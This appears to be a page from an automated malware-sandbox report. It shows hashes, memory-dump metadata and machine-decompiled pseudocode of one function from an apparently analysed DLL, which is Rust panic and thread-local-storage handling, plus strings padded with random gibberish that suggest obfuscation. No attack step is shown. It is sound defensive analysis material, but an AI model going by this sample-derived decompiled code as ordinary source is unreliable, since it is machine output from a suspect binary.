                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECDCDC0
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-1955203421
                          • Opcode ID: ecc89232d1b43d63a50719bf45e05966f4f03dfde6f164f2533a3116e5f9c6c5
                          • Instruction ID: f3c2f586aecd66abb2df4b08346bc2d052c6e8e459c049b0cf05aefafff8bbde
                          • Opcode Fuzzy Hash: ecc89232d1b43d63a50719bf45e05966f4f03dfde6f164f2533a3116e5f9c6c5
                          • Instruction Fuzzy Hash: 581224B0A002199FEB10CFE4C994BDEBBB5FF45304F108569D615AB294E776A84ACF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC890, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6ECDC890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ECE3B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed1d9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed2adc0], esi");
				_t193 = E6ECDD1B0(_t268, 0x6ed1d9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6ECF6EE0(_t268,  &M6ED1D0E7, 0x46, _t349,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed1cd60;
						_v120 = 0x6ed1d014;
						_v68 = 0x6ed1da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECD2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ECDD2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed2adc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed2adc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed1da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed1cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ECDD2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed2adbc);
					_v144 = 0x6ed2adbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ECDD1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed2adb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ECDD530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ECF6EE0(_t268,  &M6ED1D0E7, 0x46, _t352,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed2a044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed2a044;
							_t205 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed2a044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed2a044;
								_t206 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed2adc8;
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed2a044;
										_t340 = _t208;
										_t209 =  *0x6ed2a044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ECE2B10(_t268, 0x6ed2a044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ECF6C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed2adc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed2adb0;
											 *0x6ed2adb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ece3440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed2adc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ECDC800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ECF6EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6ed1d050, 0x6ed1d720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ECDC690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ECDC800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed1d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ecdde50;
										_v60 =  &_v100;
										_v56 = 0x6ecdde50;
										_v52 =  &_v148;
										_v48 = E6ECDDE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECDD2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t248);
											}
											HeapFree( *0x6ed2adc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed2adac);
											_v68 = 0x6ed1d2c0;
											_v64 = 1;
											_v152 = 0x6ed2adac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECDDEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ECDD2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed2adac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ECDC800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ECDDC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed2adbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed1cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ECDD2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ECDD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ECDD440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed2a040 = 0;
											_t368 =  *0x6ed2a040;
											if( *0x6ed2a040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed1d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed1cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6ECDD2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t238);
											}
											HeapFree( *0x6ed2adc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6ecdc897
                          0x6ecdc89a
                          0x6ecdc89e
                          0x6ecdc8a5
                          0x6ecdc8a6
                          0x6ecdc8a8
                          0x6ecdc8ad
                          0x6ecdc8b0
                          0x6ecdc8b2
                          0x6ecdc8b3
                          0x6ecdc8b4
                          0x6ecdc8b5
                          0x6ecdc8b6
                          0x6ecdc8b7
                          0x6ecdc8b8
                          0x6ecdc8b9
                          0x6ecdc8ba
                          0x6ecdc8bb
                          0x6ecdc8bc
                          0x6ecdc8bd
                          0x6ecdc8be
                          0x6ecdc8bf
                          0x6ecdc8c6
                          0x6ecdc8cc
                          0x6ecdc8cf
                          0x6ecdc8d6
                          0x6ecdc8dd
                          0x6ecdc8e2
                          0x6ecdc8e7
                          0x6ecdc8f0
                          0x6ecdc8f3
                          0x6ecdc8f9
                          0x6ecdc901
                          0x6ecdc906
                          0x6ecdc908
                          0x6ecdc922
                          0x6ecdc927
                          0x6ecdc92a
                          0x6ecdc92a
                          0x6ecdc92e
                          0x6ecdc931
                          0x6ecdc934
                          0x6ecdc936
                          0x6ecdc9aa
                          0x6ecdc9ad
                          0x6ecdca0a
                          0x6ecdca11
                          0x6ecdca1b
                          0x6ecdca22
                          0x6ecdca29
                          0x6ecdca2d
                          0x6ecdca34
                          0x6ecdca3b
                          0x6ecdca41
                          0x6ecdca44
                          0x6ecdca47
                          0x6ecdca4d
                          0x6ecdca54
                          0x6ecdca57
                          0x6ecdca5e
                          0x6ecdca63
                          0x6ecdca65
                          0x6ecdca6c
                          0x6ecdca74
                          0x6ecdca77
                          0x6ecdca79
                          0x6ecdca7c
                          0x6ecdca7c
                          0x6ecdca7f
                          0x6ecdca82
                          0x6ecdca86
                          0x6ecdca9c
                          0x6ecdca9c
                          0x6ecdcaaa
                          0x6ecdcaaa
                          0x00000000
                          0x6ecdca65
                          0x6ecdc9b2
                          0x6ecdc9b5
                          0x6ecdc9bc
                          0x6ecdc9c3
                          0x6ecdc9ca
                          0x6ecdc9d1
                          0x6ecdc9d5
                          0x6ecdc9dc
                          0x6ecdc9e3
                          0x6ecdc9e8
                          0x6ecdc9ea
                          0x00000000
                          0x6ecdc9f0
                          0x6ecdc9f5
                          0x6ecdc9fd
                          0x6ecdca00
                          0x6ecdca02
                          0x00000000
                          0x6ecdca02
                          0x6ecdc93d
                          0x6ecdc93d
                          0x6ecdc945
                          0x6ecdc94b
                          0x6ecdc955
                          0x6ecdc95c
                          0x6ecdc963
                          0x6ecdc969
                          0x6ecdc96c
                          0x6ecdc96f
                          0x6ecdc972
                          0x6ecdc975
                          0x6ecdc97a
                          0x6ecdc97d
                          0x6ecdc97f
                          0x6ecdcab3
                          0x6ecdcab3
                          0x6ecdcab6
                          0x6ecdcab8
                          0x6ecdcb8b
                          0x6ecdcb90
                          0x6ecdcb93
                          0x6ecdcb96
                          0x6ecdcd97
                          0x00000000
                          0x6ecdcd97
                          0x6ecdcb9c
                          0x6ecdcb9f
                          0x6ecdcd90
                          0x00000000
                          0x6ecdcd90
                          0x6ecdcba5
                          0x6ecdcba7
                          0x00000000
                          0x00000000
                          0x6ecdcbb0
                          0x6ecdcbb5
                          0x6ecdcbb8
                          0x6ecdcbbb
                          0x6ecdcbbd
                          0x00000000
                          0x00000000
                          0x6ecdcbc3
                          0x00000000
                          0x6ecdcbc3
                          0x6ecdcabe
                          0x00000000
                          0x6ecdc985
                          0x6ecdc99d
                          0x6ecdc9a2
                          0x6ecdcdbe
                          0x6ecdcdbe
                          0x6ecdcdc0
                          0x6ecdcdc0
                          0x6ecdcdc5
                          0x6ecdcaf3
                          0x6ecdcaf3
                          0x6ecdcaf6
                          0x6ecdcaf9
                          0x6ecdcb00
                          0x6ecdcb02
                          0x6ecdcb07
                          0x6ecdcb07
                          0x6ecdcb0d
                          0x6ecdcb16
                          0x6ecdcbf3
                          0x6ecdcbf3
                          0x6ecdcbf8
                          0x6ecdcbfa
                          0x6ecdcbfc
                          0x6ecdcc01
                          0x6ecdcc01
                          0x6ecdcc07
                          0x6ecdcc0d
                          0x6ecdcc0f
                          0x6ecdcdcf
                          0x6ecdcdd4
                          0x6ecdcdd6
                          0x6ecdcde6
                          0x6ecdcdeb
                          0x6ecdcdf0
                          0x6ecdcdf2
                          0x6ecdce32
                          0x6ecdce38
                          0x6ecdce3f
                          0x6ecdce41
                          0x6ecdce46
                          0x6ecdce48
                          0x6ecdce4f
                          0x6ecdce52
                          0x6ecdce57
                          0x6ecdce57
                          0x6ecdce5c
                          0x00000000
                          0x6ecdce5c
                          0x6ecdcdf4
                          0x6ecdcdfe
                          0x6ecdce03
                          0x6ecdce05
                          0x6ecdce05
                          0x6ecdce08
                          0x6ecdce0b
                          0x6ecdce0e
                          0x6ecdceb8
                          0x6ecdcebe
                          0x6ecdcec9
                          0x6ecdcec9
                          0x6ecdcece
                          0x6ecdcece
                          0x6ecdced0
                          0x6ecdced0
                          0x6ecdced2
                          0x6ecdcedd
                          0x6ecdcedd
                          0x6ecdcee2
                          0x6ecdcee2
                          0x6ecdceed
                          0x6ecdcef5
                          0x6ecdcef8
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcac1
                          0x6ecdcac1
                          0x6ecdcac7
                          0x6ecdcaca
                          0x6ecdcaca
                          0x6ecdcad0
                          0x6ecdcad3
                          0x6ecdcad5
                          0x6ecdcae3
                          0x6ecdcae3
                          0x6ecdcae5
                          0x6ecdcbcd
                          0x6ecdcbd0
                          0x6ecdcbde
                          0x6ecdcbe0
                          0x00000000
                          0x00000000
                          0x6ecdcbe6
                          0x6ecdcbe9
                          0x6ecdcbeb
                          0x00000000
                          0x6ecdcbeb
                          0x6ecdcaeb
                          0x6ecdcaee
                          0x6ecdcaf0
                          0x00000000
                          0x6ecdcaf0
                          0x6ecdcec0
                          0x6ecdcec2
                          0x00000000
                          0x6ecdcec2
                          0x6ecdce14
                          0x6ecdce17
                          0x00000000
                          0x00000000
                          0x6ecdce1d
                          0x6ecdce20
                          0x00000000
                          0x00000000
                          0x6ecdce26
                          0x6ecdce28
                          0x00000000
                          0x6ecdce28
                          0x6ecdcdd8
                          0x6ecdcddd
                          0x6ecdcddf
                          0x00000000
                          0x00000000
                          0x6ecdcde1
                          0x00000000
                          0x6ecdcc15
                          0x6ecdcc15
                          0x6ecdcc17
                          0x6ecdcc1a
                          0x6ecdce62
                          0x6ecdce62
                          0x6ecdce65
                          0x6ecdce68
                          0x6ecdce68
                          0x6ecdce6b
                          0x6ecdce71
                          0x6ecdce78
                          0x6ecdce7f
                          0x6ecdce85
                          0x6ecdce87
                          0x6ecdce8d
                          0x6ecdce90
                          0x6ecdce96
                          0x6ecdce96
                          0x6ecdce90
                          0x6ecdce87
                          0x00000000
                          0x6ecdce7f
                          0x6ecdcc20
                          0x6ecdcc27
                          0x6ecdcc2e
                          0x6ecdcc2e
                          0x00000000
                          0x6ecdcc2e
                          0x6ecdcb1c
                          0x6ecdcb1f
                          0x6ecdcb21
                          0x00000000
                          0x00000000
                          0x6ecdcb27
                          0x6ecdcb2a
                          0x6ecdcb2d
                          0x6ecdcdb6
                          0x6ecdcdbb
                          0x00000000
                          0x6ecdcdbb
                          0x6ecdcb33
                          0x6ecdcb39
                          0x6ecdcb3e
                          0x6ecdcb40
                          0x6ecdcb43
                          0x6ecdcb4a
                          0x6ecdcb4f
                          0x6ecdcb52
                          0x6ecdcb54
                          0x6ecdcb57
                          0x6ecdcb59
                          0x6ecdcb5b
                          0x6ecdcb5e
                          0x6ecdcb60
                          0x6ecdcb63
                          0x6ecdcb63
                          0x6ecdcb5e
                          0x6ecdcb68
                          0x6ecdcb68
                          0x6ecdcb6b
                          0x6ecdcb6e
                          0x6ecdcaaf
                          0x6ecdcaaf
                          0x6ecdcab1
                          0x00000000
                          0x6ecdcb74
                          0x6ecdcb74
                          0x6ecdcb78
                          0x6ecdcb7b
                          0x6ecdcb7e
                          0x6ecdcea0
                          0x6ecdcea6
                          0x6ecdcea8
                          0x6ecdcea8
                          0x6ecdceab
                          0x6ecdd062
                          0x6ecdd062
                          0x6ecdd067
                          0x6ecdd068
                          0x6ecdd068
                          0x6ecdcc30
                          0x6ecdcc37
                          0x6ecdcc3e
                          0x6ecdcc45
                          0x6ecdcc4c
                          0x6ecdcc50
                          0x6ecdcc57
                          0x6ecdcc5e
                          0x6ecdcc65
                          0x6ecdcc6d
                          0x6ecdcc70
                          0x6ecdcc76
                          0x6ecdcc79
                          0x6ecdcc7f
                          0x6ecdcc85
                          0x6ecdcc8c
                          0x6ecdcc95
                          0x6ecdcc9c
                          0x6ecdcca2
                          0x6ecdcca9
                          0x6ecdccac
                          0x6ecdccba
                          0x6ecdccc1
                          0x6ecdccc9
                          0x6ecdcccc
                          0x6ecdccce
                          0x6ecdccd1
                          0x6ecdccd4
                          0x6ecdccdb
                          0x6ecdccdd
                          0x6ecdcce3
                          0x6ecdcce5
                          0x6ecdcce5
                          0x6ecdccf1
                          0x6ecdccf1
                          0x6ecdccff
                          0x6ecdccff
                          0x6ecdcd04
                          0x6ecdcd15
                          0x6ecdcd1a
                          0x6ecdcf0b
                          0x6ecdcf1a
                          0x6ecdcf21
                          0x6ecdcf28
                          0x6ecdcf32
                          0x6ecdcf35
                          0x6ecdcf3c
                          0x6ecdcf43
                          0x6ecdcf49
                          0x6ecdcf50
                          0x6ecdcf53
                          0x6ecdcf5a
                          0x6ecdcf5f
                          0x6ecdcf68
                          0x6ecdcf6e
                          0x6ecdcf71
                          0x00000000
                          0x00000000
                          0x6ecdcf78
                          0x6ecdcf80
                          0x6ecdcf83
                          0x6ecdcf85
                          0x00000000
                          0x6ecdcd20
                          0x6ecdcd23
                          0x6ecdcfc0
                          0x6ecdcfc3
                          0x6ecdcfc5
                          0x6ecdcfc7
                          0x6ecdcfca
                          0x6ecdcfcf
                          0x6ecdcfcf
                          0x6ecdcfca
                          0x6ecdcfd7
                          0x6ecdcfdd
                          0x6ecdcfe3
                          0x6ecdcfe5
                          0x6ecdcfe7
                          0x6ecdcfea
                          0x6ecdcfef
                          0x6ecdcfef
                          0x6ecdcfea
                          0x6ecdcff9
                          0x6ecdcfff
                          0x6ecdd003
                          0x6ecdd00a
                          0x6ecdd012
                          0x6ecdd019
                          0x6ecdd020
                          0x6ecdd027
                          0x6ecdd02e
                          0x6ecdd032
                          0x6ecdd039
                          0x6ecdd040
                          0x6ecdd048
                          0x6ecdd04b
                          0x6ecdd04e
                          0x6ecdd053
                          0x6ecdd055
                          0x6ecdd055
                          0x6ecdd057
                          0x6ecdd05b
                          0x6ecdd060
                          0x00000000
                          0x6ecdd060
                          0x6ecdcd2b
                          0x6ecdcd31
                          0x6ecdcd33
                          0x00000000
                          0x00000000
                          0x6ecdcd3c
                          0x6ecdcd3f
                          0x6ecdcd46
                          0x6ecdcd4d
                          0x6ecdcd54
                          0x6ecdcd5b
                          0x6ecdcd62
                          0x6ecdcd70
                          0x00000000
                          0x00000000
                          0x6ecdcd7b
                          0x6ecdcd7e
                          0x6ecdcd86
                          0x6ecdcd88
                          0x6ecdcf88
                          0x6ecdcf8b
                          0x6ecdcf92
                          0x6ecdcf9b
                          0x6ecdcf9d
                          0x6ecdcf9f
                          0x6ecdcf9f
                          0x6ecdcfab
                          0x6ecdcfab
                          0x6ecdcfbb
                          0x00000000
                          0x6ecdcfbb
                          0x6ecdcd1a
                          0x6ecdceb1
                          0x00000000
                          0x6ecdceb1
                          0x6ecdcb84
                          0x00000000
                          0x6ecdcb84
                          0x6ecdcb6e
                          0x6ecdcb16
                          0x6ecdc97f

                          APIs
                            • Part of subcall function 6ECDC8C0: AcquireSRWLockShared.KERNEL32(6ED2ADBC), ref: 6ECDC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCCFF
                          Strings
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6ECDC90D, 6ECDC988
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECDCDC0
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
